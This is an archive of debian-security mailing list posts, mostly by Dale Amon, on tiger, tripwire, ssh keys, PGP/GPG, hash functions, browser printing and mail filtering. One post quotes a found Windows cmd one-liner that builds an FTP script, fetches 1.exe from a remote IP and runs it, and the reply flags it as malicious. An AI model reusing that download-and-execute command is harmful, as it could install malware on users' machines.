Re: Tiger, dirvish and dangling symlinks

2009-10-11 Thread Dale Amon
On Mon, Sep 28, 2009 at 01:12:31AM +0200, Javier Fernández-Sanguino Peña wrote:
> On Tue, Sep 01, 2009 at 08:53:34PM +0100, Dale Amon wrote:
> > So is there a way to simply tell tiger to not look
> > at certain disk drives? It seems rather silly to have
> > it wasting time processing 30-40TB of backups when all
> > that is needed is to monitor the actual system disks.
> 
> IIRC You can use the Tiger_FSScan_NonLocal variable to have Tiger skip those
> filesystems that are not considered "local" or you can disable (in
> /etc/tiger/cronrc) the checks that will process the filesystem starting from
> / (check_perms, find_files, check_devices
> 
> Regards
> 
> Javier

Thanks. I'll look into that!




signature.asc
Description: Digital signature


Tiger, dirvish and dangling symlinks

2009-09-01 Thread Dale Amon
I am working on a backup box with a huge disk capacity
that is being used as a dirvish incremental backup for
a bunch of systems.

This of course means there are just thousands upon 
thousands of 'apparently' danglying symlinks since
the backups are 'out of context' as it were.

This causes tiger to output useless emails about
them and waste space in security logs about them.

So is there a way to simply tell tiger to not look
at certain disk drives? It seems rather silly to have
it wasting time processing 30-40TB of backups when all
that is needed is to monitor the actual system disks.

Ad Astra,
Dale Amon






signature.asc
Description: Digital signature


Re: Time to replace MD5?

2007-06-13 Thread Dale Amon
On Tue, Jun 12, 2007 at 07:39:38PM -0400, Joey Hess wrote:
> Bernd Eckenfels wrote:
> > Because open source is all about choice.
> 
> So it's there because of a platitude?
> 
> > There might be admins using dpkg -i
> > or security officers who build their local mirrors manually.
> 
> Then why don't we include md5sums and wget commands for all packages in
> stable point release annoucements? Why not include them in major release
> announcements too? Or are these things somehow less "all about choice"?

Yes, there are a lot of us who use dpkg -i, and do it
very often. I may be missing something in this thread
because it seems to blatently obvious to me that this
is a necessary and important tool that I am having
difficulty understanding where this is going.




-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: spooky windows script

2007-05-08 Thread Dale Amon
On Tue, May 08, 2007 at 02:57:24PM +0200, Jan Outhuis wrote:
> %systemroot%\system32\cmd.exe
> cmd /c echo open 59.31.153.120 22783 >> ik &echo user db database >> ik &echo 
> get 1.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &1.exe &exit

If you were running a windows system this might
do something really nasty since it creates a download
script and executes it. Perhaps to pull in a root kit?. 
I haven't done DOS in a long time so I am a bit shaky 
in fully interpreting.

Check for something named 1.exe in your directory.


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: [OT] Re: email notifications when users login

2006-09-23 Thread Dale Amon
On Thu, Sep 21, 2006 at 03:37:56PM -0400, Morgan Walker wrote:
> 
> Thanks Michelle that worked perfect.  Is there an easy variable I could
> throw in there that you know off hand which would include the time
> (MM/DD/) as well?

TIME=`date +%m/%d/%Y`

-- 
--
 Artemis Systems Development
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: serious bug / 1.7.8-1sarge7.2.1_i386 / URGENT

2006-09-05 Thread Dale Amon
On Tue, Sep 05, 2006 at 01:04:40AM +0200, Von Wolher wrote:
> Thank you very much for the lightspeed reaction and fix !!!
> I'll set those extra lines in the sources.list of a few general use
> boxes which also run pure debian sarge and will keep you updated in case
> an updated doesn't workout.

Perhaps I am not the only one who has seen problems
in recent firefox updates then... I can reliably crash
my firefox browser simply by going to google maps. It
starts loading the map... and then falls over.

-- 
--
 Artemis Systems Development
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: closing unwanted ports - and what is 1720/tcp filtered H.323/Q.931

2005-12-15 Thread Dale Amon
On Thu, Dec 15, 2005 at 12:35:09PM +, kevin bailey wrote:
> what is 
> 1720/tcp filtered H.323/Q.931

Are you running any VOIP? H323 is the standard for telephone
interchanges.

> and how do i turn it off if it is uneccessary.

netstat, lsof, fuser, the usual suspects...

-- 
--
 Artemis Systems Development
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: hardening checkpoints

2005-12-15 Thread Dale Amon
On Thu, Dec 15, 2005 at 12:27:01PM +, kevin bailey wrote:
> 2. firewall
> not i'm not sure about the need for a firewall - i may need to access the
> server over ssh from anywhere.  also, to run FTP doesn't the server need to
> be able to open up a varying number of ports.

There is a way around this. If you are really worried
about a mistake, use 'at' to turn the firewall off after
5 minutes. That way you can set up your test and if
you screwed up you only have to wait a few min before
it goes away. If it worked, you just kill the queued
at command line.

-- 
--
 Artemis Systems Development
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: What is a security bug?

2005-11-24 Thread Dale Amon
On Wed, Nov 23, 2005 at 11:10:25PM -0800, Thomas Bushnell BSG wrote:
> It seems it does not save form entries (which was not mentioned
> explicitly in Florian's post above), but it certainly does save the
> tabs and multiple windows information and such.

Galeon and firefox have *always* had this sort of 
crash problem. It is especially apparent when printing
ps to file. There are some **major** sites which will 
reliably crash your browser.

-- 
--
 Artemis Systems Development
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: On Mozilla-* updates

2005-08-01 Thread Dale Amon
On Mon, Aug 01, 2005 at 09:29:24AM +0200, Stefano Salvi wrote:
> I think that two kinds of people are interested in Debian:
> - Ones who want Security
> - Ones who want Stability

While not an unreasonable part of an analysis, I would
posit these are at least second level criteria for
systems users. The most important factor for anyone
in a corporate environment, (and for many in a home
environment as well), is "Does Debian allow me to get
my work done faster and more efficiently?"

Issues of security, package content, stability and
such are imperfect tradeoffs towards fulfilling that
goal. 

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: My machine was hacked - possibly via sshd?

2005-03-29 Thread Dale Amon
On Mon, Mar 28, 2005 at 12:37:46PM -0800, Alvin Oga wrote:
> > When I logged on I discovered two outgoing connections to port ircd on 
> > the foreign hosts, and some thing listening on port 48744 TCP.  
> 
> sorta harmless ... script kiddies having fun

Does not sound like it. I would say it was a trojan
calling home for orders. The criminal gangs tend to 
use irc for botnet control.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Spamassassin slowdown?

2005-01-20 Thread Dale Amon
Has anyone noticed a big slow down in spam assassin?
I know it is no speed demon in the best of times, but
I have started seeing huge loads and am modifying my
exim4.conf to send fewer files through it... just so
I can receive email again.

The problem began just a couple of days ago, I believe
not long after the last dselect update I did...

My poor little server is on its knees crying in pain. 
Very sad sight. :-(

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: A tripwire annoyance

2004-10-06 Thread Dale Amon
On Wed, Oct 06, 2004 at 10:56:53AM -0400, Noah Meyerhans wrote:
> On Wed, Oct 06, 2004 at 02:53:19PM +0100, Dale Amon wrote:
> > I've been running tripwire on a particular server
> > for some years and finally got annoyed at skimming through
> > the large reports, so I began an update... After 24 hours
> > I thought it was hung and killed it. I restarted it
> > with verbose and found that it is indeed working. And
> > just for the hell of it, I've left it running to see
> > how long it would take.
> 
> Which version of tripwire is this?  It sounds like behavior I'd expect
> to see with the ancient ancient ancient version that we shipped prior to
> woody (there is no tripwire in woody), but I've never seen anything like
> that with tripwire 2+.
> 
> How did you perform this update?  The "right way" to do it is to do
> 'tripwire -m u ', which doesn't actually look at the
> filesystem at all but simply merges the filesystem data contained in the
> report into the database.
> 
> noah
> 

I usually do this:

 tripwire --update -V emacs -Z high -r 
/var/lib/tripwire/report/--.twr

but the second run through I had already looked over the
file so I did this:

 tripwire -v -a -r /var/lib/tripwire/report/--.twr

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


A tripwire annoyance

2004-10-06 Thread Dale Amon
I've been running tripwire on a particular server
for some years and finally got annoyed at skimming through
the large reports, so I began an update... After 24 hours
I thought it was hung and killed it. I restarted it
with verbose and found that it is indeed working. And
just for the hell of it, I've left it running to see
how long it would take.

It has been running for 10 days now, and almost entirely
within the /var/log/snort directory. Has anyone else
had problems with tripwire and snort together on a 
box on an ISP backbone (ie lots of snort files)?

I've been considering stopping it and fiddling with
the config, but first... I'm curious if I am alone in 
this problem.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: [OT] Collective memory query

2004-09-27 Thread Dale Amon
On Mon, Sep 27, 2004 at 10:04:00PM +1000, Andrew McGlashan wrote:
> Try again:
> http://packages.debian.org/testing/utils/rpl
> "Intelligent recursive search/replace utility"

Thanks much. I do believe that is the one. 

*amon runs off to dselect yet again...

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


[OT] Collective memory query

2004-09-27 Thread Dale Amon
A couple years ago I ran across a sed like program
that will recursively descend through a tree and apply
specified edits in place. I have searched my notes,
gone through the deb available and have not been able
to find it. Might just have been something on
SourceForge...

Has anyone else run across a program of this nature?

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: telnetd vulnerability from BUGTRAQ

2004-09-25 Thread Dale Amon
On Sat, Sep 25, 2004 at 10:34:43AM -0500, hanasaki wrote:
> Jan Minar wrote:
> >On Fri, Sep 24, 2004 at 04:15:09PM -0600, s. keeling wrote:
> >>Is anyone still using telnet when there's ssh?  Why?  I wouldn't even
> >>use it inside my own firewalled LAN.  ssh is just better.
> >I've been told telnet *does* make a lot of sense where IPSEC is set up.
> 
> When IPSEC is being used, telnet works the same; however is secure 
> because it, like all traffic, is sent over a transparent tunnel.

One very good reason to avoid it even in tunnels is
that you get into bad habits. One tired night you 
forget and connect over an unsecured link to a
key machine... and you're toast.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: telnetd vulnerability from BUGTRAQ

2004-09-24 Thread Dale Amon
On Sat, Sep 25, 2004 at 08:28:13AM +1000, Matthew Palmer wrote:
> Cisco gear contains the Debian telnetd?  And if that's true, how would us
> releasing a DSA for it necessarily help all the Cisco routers out there.
> We're not talking about the general intelligence of using telnet (or, at
> least, that wasn't the initial topic of discussion), but rather the
> possibility of fixing security problems in the stock telnetd in Debian.

The question asked was "why is anyone still using telnet
when there is ssh". And I would say that Cisco and some
other gear are about the only reasons why anyone would
still make a connection with the telnet protocol (other
than for testing odd things... I used to use 'telnet foo 110'
to hand test my company pop server when someone had problems.

So no, I was not replying about Debian fixes, I was replying
to the general question of 'why telnet at all'.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: telnetd vulnerability from BUGTRAQ

2004-09-24 Thread Dale Amon
On Fri, Sep 24, 2004 at 04:15:09PM -0600, s. keeling wrote:
> Is anyone still using telnet when there's ssh?  Why?  I wouldn't even
> use it inside my own firewalled LAN.  ssh is just better.

Unfortuneately if you use Cisco gear you are pretty
much stuck. Some of the older stuff just doesn't
have the mips to deal with it even if installed and
I believe Cisco charges an arm and a leg for the
upgrade. I've never had a Cisco with it installed.

So use, if you work with routers, you are stuck.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: ssh publickey auth

2004-09-14 Thread Dale Amon
On Tue, Sep 14, 2004 at 05:06:59PM +0200, Fox wrote:
> Le Tue, Sep 14, 2004 at 04:01:57PM +0100, Dale Amon ecrivait:

> > Failed to add the host to the list of known hosts (/user1/.ssh/known_hosts).
> 
> Don't you see any problem here ?

It was a symptom which I mistook for something else
entirely since I was still able to log in with a 
password.

It's the client side protections. I was blindly 
focusing on the server side.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: ssh publickey auth

2004-09-14 Thread Dale Amon
On Tue, Sep 14, 2004 at 04:05:23PM +0100, Jan Eringa wrote:
> The newer versions of SSH(d) are very strict about
> the file permisions on the .ssh directory & the publick key pair

Yes, I spotted that just after I sent a reply. That fixed the
problem.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: ssh publickey auth

2004-09-14 Thread Dale Amon
rinfo for scout.islandone.org failed - POSSIBLE BREAKIN 
ATTEMPT!
debug1: PAM: setting PAM_RHOST to "10.0.0.25"
debug1: PAM: setting PAM_TTY to "ssh"
debug1: temporarily_use_uid: 1008/1008 (e=0/0)
debug1: trying public key file /user1/.ssh/authorized_keys
debug1: matching key found: file /user1/.ssh/authorized_keys, line 1
Found matching DSA key: ee:c5:7d:12:df:db:e7:d6:aa:43:17:c0:19:e0:a0:35
debug1: restore_uid: 0/0
Postponed publickey for user1 from 10.0.0.25 port 2743 ssh2
debug1: userauth-request for user user1 service ssh-connection method 
keyboard-interactive
debug1: attempt 2 failures 1
debug1: keyboard-interactive devs 
debug1: auth2_challenge: user=user1 devs=
debug1: kbdint_alloc: devices 'pam'
debug1: auth2_challenge_start: trying authentication method 'pam'
Postponed keyboard-interactive for user1 from 10.0.0.25 port 2743 ssh2
Connection closed by 10.0.0.25

And yes, there are some things on my test lan's dns 
that need sorted :-)

I might add that the target machine is a testbed with
sarge-di installed about a week or two ago and then
updated and added to via dselect. So it is really
bog-standard debian.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: ssh publickey auth

2004-09-14 Thread Dale Amon
On Tue, Sep 14, 2004 at 04:08:17PM +0200, Oliver Hitz wrote:
> It is possible that public key authentication is disabled in
> /etc/ssh/sshd_config. Check that you have "PubkeyAuthentication yes" in
> said file.

Double checked. It is 'yes' on the server, target
host sshd_config. According to docs it is the default
for the client ssh_config which is 'out of the box'
debian with everything defaulted.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


ssh publickey auth

2004-09-14 Thread Dale Amon
I've an application that needs a secure automatic login 
from an application program, between particular accounts
on particular machines.

I know this used to work (a few years ago!) but I
am having difficulty this time around getting it going.

I'm using a public key for the connection, with null
password given when asked by the ssh-keygen.

The destination machine accepts that the publickey
is valid but asks for a passphrase nonetheless. It
doesn't accept a return for null password either, it
falls back on normal password log in. 

As I said, I've not done this particular set up in,
oh, 6 years, so I would not be surprised if there
were changes in the debian defaults for sshd, pamd,
the way ssh handles things etc, etc.

A suggestion or three would be appreciated.

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


PGP vs GPG

2004-08-27 Thread Dale Amon
Hmmm... We were just talking about this key compatibility
issue a couple weeks ago. Is there something special you have
to do in Debian to import PGP keys? Didn't the RSA patent
expire already?

gpg --import < amon.pub
gpg: key 42F4CD71: public key "Dale Amon (office) <[EMAIL PROTECTED]>" imported
gpg: Total number processed: 1
gpg:   imported: 1

gpg --import < gary.pub 
gpg: no valid OpenPGP data found.
gpg: Total number processed: 0
cat gary.pub 
-BEGIN PGP SIGNATURE-
Version: PGP Personal Privacy 6.5.8

 

-END PGP SIGNATURE-

-- 
------
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: MD5 collisions found - alternative?

2004-08-25 Thread Dale Amon
On Thu, Aug 26, 2004 at 01:04:21AM +0200, Almut Behrens wrote:
> ...and I think somewhere in between lie hashing functions like crc32,
> as used for detecting transmission errors, for example.  Those are
> not cryptographic, but possess a sufficiently large output space, so we
> can expect few random collisions for most practical purposes.

I wouldn't call CRC a hash code although you can use it that way
I guess. It is really an error detecting and correction
code that does have the ability, in a sense, to go backwards. It 
stands for Cyclic Redundancy Check. Such codes are redudant data,
to be included with a transmission, not a hash. Some of them
allow correction of multiple bit errors; typically you can detect
1 bit of error more than you can correct.
 
> Right, but I believe that a uniform mapping _also_ is a desirable
> property (besides speed, of course) of hashing functions as used to
> compute table lookup indices -- as this property assures that the data
> storage locations will be spread as evenly as possible across the
> available buckets, which in turn minimizes the time spent on resolving
> collisions (on average).  And, as practical considerations in this case
> always enforce a rather small output space (i.e. number of buckets)
> we're certainly expecting collisions here. [1]

Well, in theory yes. In practice you usually aren't much fussed
if you've got a variance in the bucket utilization unless you're
working on something with a real need for speed. For example, I
would bet there are some really, really good uniform hash functions
used inside of gcc. 
 
> > * randomness. Input strings which differ by 1 bit in any
> >   position generate hash keys a random distance apart
> 
> I'd add:
>   * huge size of the output space (with its upper limit corresponding
> to the number of bits of the hash value).  The probability of
> accidentally finding a collision is of course directly related to
> the size of the output space (assuming a uniform mapping).

Yes, can't argue there. That is where the basic difference between
a typical hash function and a cryptographic hash comes. You want
small keyspaces and very simple functions to generate lookup keys,
whereas you don't much care about the function overhead for a
cryptographic key as you tend not to do the encodings as often.
 
> If anyone knows of any other requirements, please feel free to chime
> in... Well, OTOH, this would probably be getting a little off-topic for
> debian-security (especially the debian aspect).

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


signature.asc
Description: Digital signature


Re: MD5 collisions found - alternative?

2004-08-25 Thread Dale Amon
On Wed, Aug 25, 2004 at 06:02:22AM +0200, Almut Behrens wrote:
> Somewhat more seriously: are there generally any defining criteria for
> something one would call a 'hash function', saying that it always must
> map some larger input space to some smaller output space?

Yes. A hash function is any mapping function

y = map(x)

where the space y is smaller than the space x. Hashing (think of
cornbeef hash with things all chopped up into bits) is a technique
to generate fast lookup keys. The discussion here is about 
cryptographic hash functions. I believe the primary difference is
that a cryptographic hash is:

* a uniform mapping. For input space n and output space m,
  there are on average n/m strings with the same hash key.
* randomness. Input strings which differ by 1 bit in any
  position generate hash keys a random distance apart
  
While these features are also useful in writing assembler
and compilers, they are not *that* important. I've often
used hash functions as simple as:

"add the first 8 chars and take the low byte
 of the integer summand."

Obviously not cryptographic.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: pgp in Debian: obsolete?

2004-08-05 Thread Dale Amon
On Thu, Aug 05, 2004 at 11:40:09AM -0700, Rick Moen wrote:
> > Keep in mind people may have encrypted files and email
> > archived. The means of accessing archive data should
> > be considered to be at least as immortal as the data
> > itself.
> 
> Aren't GnuPG's decryption/verification features a superset of those in
> PGPi 5.0?  That's not a rhetorical question:  I've been telling people
> that for years in a good faith effort at accuracy, and so will
> appreciate any corrections.

I don't know for sure either. I do seem to remember 
there was a document explaining how to transition
and that there was a new key generation method. I also
vaguely remember having some problem with my own
package signing keys when the switch was made from
PGP to GPG, but that is 4-5 years ago and I cannot
for the life of me remember the details. I just have
a vague disquiet about it.

I'm certain that somewhere I've got files using the
old keys, and since I'm in Ireland, Murphy will
drop in for tea the day after PGP goes away...

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: pgp in Debian: obsolete?

2004-08-05 Thread Dale Amon
On Thu, Aug 05, 2004 at 06:51:22PM +0100, Ian Beckwith wrote:
> If there is a demand for it, is there any reason I shouldn't upgrade
> to the package to the latest pgp? (6.5.8 I believe, assuming the
> international pgp restrictions no longer apply).

Keep in mind people may have encrypted files and email
archived. The means of accessing archive data should
be considered to be at least as immortal as the data
itself.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Exim security may be breaking some functionality

2004-07-14 Thread Dale Amon
On Wed, Jul 14, 2004 at 09:57:01AM +0200, Florian Weimer wrote:
> > Would someone concerned with exim packaging and
> > security contact me directly?

Exim4, but I've got the problem understood and sorted.
Exim drops some privs during the time while it does
verifies. Specifically, during a verify-only of
mine in a router, accessed during the HELO.

After discussion with Philip, I solved my problem
by writing a client/server pair to handle my
address verifies and call the client from Exim4.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Mozilla/Firefox "PostScript/default" security problems

2004-07-10 Thread Dale Amon
On Sat, Jul 10, 2004 at 12:47:18PM +0200, Magnus Therning wrote:
> Yes. Printing PS to a file is still possible.

Thanks. I had visions of all sorts of extra work in
order to just stand still. Now I can forget about this
and go back to writing my mail address verify 
daemon...

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Mozilla/Firefox "PostScript/default" security problems

2004-07-10 Thread Dale Amon
On Fri, Jul 09, 2004 at 06:38:49PM -0500, Brad Sims wrote:
> If you want postscript back; simply grab the source deb and roll your own; 
> just edit rules under the debian folder. Delete the '--with-xprint' and
> '--disable-postscript' lines and do 'dpkg-buildpackage -rfakeroot'. However 
> I did give the debs a version number of 99 to keep apt from updating them
> until there is a new mozilla version from upstream.

I'd like a black and white clarification of the impact 
of the change so I know for certain whether to be
incredibly pissed off at the packager or not:

"If I were to dselect today, would I still
 be able to print to file a website page 
 as ps?" [Y/N] 

I do this as a matter of course, every single day
to archive data important to projects I work on. I
don't have time to rebuild mozilla myself all the time,
so if the answer to this is that I cannot... I have
four choices in descending order of desirability:

* find someone else with a repository that
  overrides it.

* freeze forever / manually update selected
  packages.

* abandon Debian mozilla

* abandon Debian

If it is true that someone out there is playing with 
things important to my means of making a living, I do 
not appreciate it in the least.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Cite for print-to-postscript exploit in Mozilla?

2004-07-09 Thread Dale Amon
On Fri, Jul 09, 2004 at 12:18:30PM -0300, Henrique de Moraes Holschuh wrote:
> OTOH, maybe the postscript code in mozilla itself has a security hole.  But
> the right thing to do would be to *fix* that instead, not to drop it.

Question: are you saying that Mozilla based browsers
(eg Galeon) can now not print web pages to a postscript
printer or have I missed something? If that is the
case, I will not be doing a dselect for a very long
time! Webpage printing is a nonnegotiable, mission
critical tool in my Revenue Generating Activities...

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Exim security may be breaking some functionality

2004-07-04 Thread Dale Amon
Would someone concerned with exim packaging and
security contact me directly? I've got some issues
that are a bit lengthy and specialized and probably
of little interest to most.

I believe something done recently may have caused
some obscure breakage in queryprogram. 

Please RSVP at your earliest convenience...

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: Why not push to stable?

2004-06-29 Thread Dale Amon
On Sat, Jun 26, 2004 at 09:27:23PM +0200, Andreas Barth wrote:
> * martin f krafft ([EMAIL PROTECTED]) [040626 15:55]:
> > Note that I am not trying to undermine or criticise or change the
> > Debian security policy. I just want to understand it.

Let's say you have your own internal corporate release.
You have a policy in place that requires you to be able
to identify precisely what the internal state of your
thousands of machines are. Or perhaps you are a facility
that audits things and you do your own secret fixes 
(for instance if you were a government security agency).

You want to at all times have a stable, known base to
start from to apply *your own* fixes. You do not want
stable to be changing underneath you every second day.
If it does, you will go stark raving mad trying to
keep your internal facilities and patches and applications
synced.

Debian is doing this the correct way. Stable is just
what it says on the label: stable. It is a base you
can build on and it won't change underneath you.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: password managers

2004-06-14 Thread Dale Amon
On Mon, Jun 14, 2004 at 02:56:15PM -0400, andrew lattis wrote:
> what does everyone else use to keep track of all there passwords?

Try gringotts.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: password managers

2004-06-14 Thread Dale Amon
On Mon, Jun 14, 2004 at 02:56:15PM -0400, andrew lattis wrote:
> what does everyone else use to keep track of all there passwords?

Try gringotts.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]



Re: rbl's status?

2004-06-14 Thread Dale Amon
On Mon, Jun 14, 2004 at 04:57:42PM +1000, Russell Coker wrote:
> relays.ordb.org, reject_rhsbl_client rhsbl.sorbs.net, reject_rhsbl_client 
> dsn.rfc-ignorant.org, reject_rhsbl_client postmaster.rfc-ignorant.org

Just to publicly eat my previous words... I submitted
the request, had a *person* respond within 5 minutes
and removal is already in the queue.

Amazing.

-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: rbl's status?

2004-06-14 Thread Dale Amon
On Mon, Jun 14, 2004 at 04:57:42PM +1000, Russell Coker wrote:
> a test message to [EMAIL PROTECTED] and it hasn't bounced yet...  Maybe the 
> Yahoo abuse team are being butt-head's about clicking on the removal URL.

Yeah, just I found I got listed by ignoramuses about RFC's due to a
mail helper program crashing...
 
-- 
--
   Dale Amon [EMAIL PROTECTED]+44-7802-188325
   International linux systems consultancy
 Hardware & software system design, security
and networking, systems programming and Admin
  "Have Laptop, Will Travel"
--



Re: rbl's status?

2004-06-14 Thread Dale Amon
On Mon, Jun 14, 2004 at 04:57:42PM +1000, Russell Coker wrote:
> relays.ordb.org, reject_rhsbl_client rhsbl.sorbs.net, reject_rhsbl_client 
